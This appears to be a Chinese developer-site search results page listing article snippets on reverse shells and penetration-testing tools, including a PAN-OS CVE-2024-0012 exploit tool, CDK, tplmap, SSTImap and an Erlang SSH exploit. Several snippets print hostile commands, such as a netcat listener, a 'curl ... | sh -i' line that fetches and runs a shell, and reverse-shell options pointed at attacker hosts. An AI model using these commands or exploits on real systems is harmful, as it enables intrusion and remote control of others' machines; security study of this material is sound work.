首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • PAN-OS CVE-2024-0012 命令注入与权限绕过利用工具

    反向 Shell 部署:提供 --reverse-shell 选项,可自动部署反向 Shell,方便攻击者进行交互式操作。 192.168.1.100)上监听端口 4444,并在目标上部署反向 Shell:python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost LHOSTstring反向 Shell 连接的本地主机 IP (使用 --reverse-shell 时必须)。 --lport LPORTint反向 Shell 连接的本地端口 (使用 --reverse-shell 时必须)。核心代码1. parser.add_argument('--command', default='uname -a', help='在目标上执行的命令') parser.add_argument('--reverse-shell

    9510编辑于 2026-02-28
  • 来自专栏网络安全攻防

    Docker反弹shell

    文章前言本篇文章我们主要介绍一些在Docker中反弹shell到远程服务器的方法常见方法Step 1:在远程服务器端监听端口nc -lnvp 9999Step 2:通过CDK反弹shell#命令格式cdk run reverse-shell <ip>:<port>#使用实例cdk run reverse-shell 192.168.17.143:9999Step 3:成功获取到shell其他技巧我们还可以使用反引号来反弹shell`/bin

    63410编辑于 2023-12-22
  • 来自专栏网络安全技术点滴分享

    WHIDInjector 系统整体分析

    , default='127.0.0.1', help='Host reverse-shell' ) parser.add_argument('--port', nargs , default='4242', help='Port reverse-shell' ) parser.add_argument('--user', nargs

    16800编辑于 2025-06-16
  • 来自专栏TomatoCool

    tplmap

    在目标的TCP端口上生成系统Shell并连接到它 --reverse-shell=..

    42910编辑于 2023-07-30
  • 来自专栏闪石星曜CyberSecurity

    python与安全(四)shell反弹

    sh-c "curlhttps://shell.now.sh/localhost:1337 | sh -i &"&&exit 工具地址:https://github.com/lukechilds/reverse-shell

    1.1K10发布于 2020-07-27
  • 来自专栏FreeBuf

    对ShadowBrokers Envison Collision漏洞的利用分析

    IPBoard Hook Creation (IPBoard Documentation) Our Modified “envisioncollision” Exploit PentestMonkey’s Reverse-Shell

    80990发布于 2018-02-26
  • 来自专栏HACK学习

    基于Termux打造Android手机渗透神器

    (9)安装RouterSploit #安装 apt install python2 git clone https://github.com/reverse-shell/routersploit pip2

    8.8K23发布于 2019-08-06
  • 来自专栏cultureSun学安全

    更新一些日常BUG或小技巧

    DISTINCT > ORDER BY > LIMIT 知道sql语句的执行顺序其实重要,对分析sql语句有帮助 SQL 5、在线生成反弹shell的网站 https://forum.ywhack.com/reverse-shell

    55820编辑于 2023-05-18
  • 来自专栏Khan安全团队

    神兵利器 - 具有交互式界面的自动 SSTI 检测工具

    --bind-shell PORT Connect to a shell bind to a target port --reverse-shell HOST PORT

    1.5K30编辑于 2023-02-23
  • 来自专栏Seebug漏洞平台

    404星链计划 | Platypus:支持多会话的交互式反向 Shell 管理器

    受到 lukechilds 的 reverse-shell 项目的启发,Platypus 支持 Reverse Shell as a Serivce (RaaS),基本语法与其相同。

    1.7K30发布于 2021-11-26
  • 来自专栏FreeBuf

    SSTImap:一款带有交互式接口的自动化SSTI检测工具

    --tpl-cmd 向模版引擎注入代码 --bind-shell PORT 连接至绑定了目标设备端口的Shell --reverse-shell

    2.7K20编辑于 2023-03-30
  • 来自专栏Seebug漏洞平台

    404星链计划 | CDK:一款针对容器场景的多功能渗透工具

    rewrite-cgroup-devices ✔ link 网络探测 K8s组件探测 service-probe ✔ link 信息收集 检查和获取Istio元信息 istio-check ✔ link 远程控制 反弹shell reverse-shell

    1.5K30发布于 2021-11-17
  • 来自专栏网络安全技术点滴分享

    一键利用Erlang SSH高危漏洞获取反向Shell

    build_channel_open())) time.sleep(0.3) print("[*] Sending exec request with Erlang reverse-shell

    12310编辑于 2026-02-04
  • 来自专栏网络安全技术

    CVE-2022-22963:Spring Cloud Function SpEL远程代码执行漏洞复现全记录!从端口扫描探测到反弹Shell的完整攻防

    附工具网站推荐) 这里我用我的kali作为反弹机子,IP地址为192.168.94.139 然后制造反弹shell命令,这里我推荐一个制作shell网站 地址:https://forum.ywhack.com/reverse-shell

    57210编辑于 2026-03-17
  • 来自专栏网络安全【故里】

    靶机渗透-Vulnerable Docker1 Hard

    直接在安装Plugin处上传马,无需压缩,不返回上传路径,但是路径就是/wp-content/uploads/2024/02/ma.php 404改源码 kali里面有这种马,搜一下locate reverse-shell

    59110编辑于 2024-02-15
  • 来自专栏FreeBuf

    安全从业人员常用工具指引

    /iotdb (使用nmap扫描IoT设备) https://github.com/jh00nbr/Routerhunter-2.0 (路由器漏洞扫描利用) https://github.com/reverse-shell

    2.6K91发布于 2018-02-27
  • 来自专栏kayden

    一文了解SSTI和所有常见payload 以flask模板为例

    Execute shell commands --bind-shell PORT Connect to a shell bind to a target port --reverse-shell

    6.3K21编辑于 2022-09-30
  • 来自专栏云安全

    Kubernetes 安全大揭秘:从攻击面剖析到纵深防御体系构建(下)

    backdoor  template:    metadata:      labels:        app: backdoor    spec:      containers:      - name: reverse-shell

    79711编辑于 2025-02-27
领券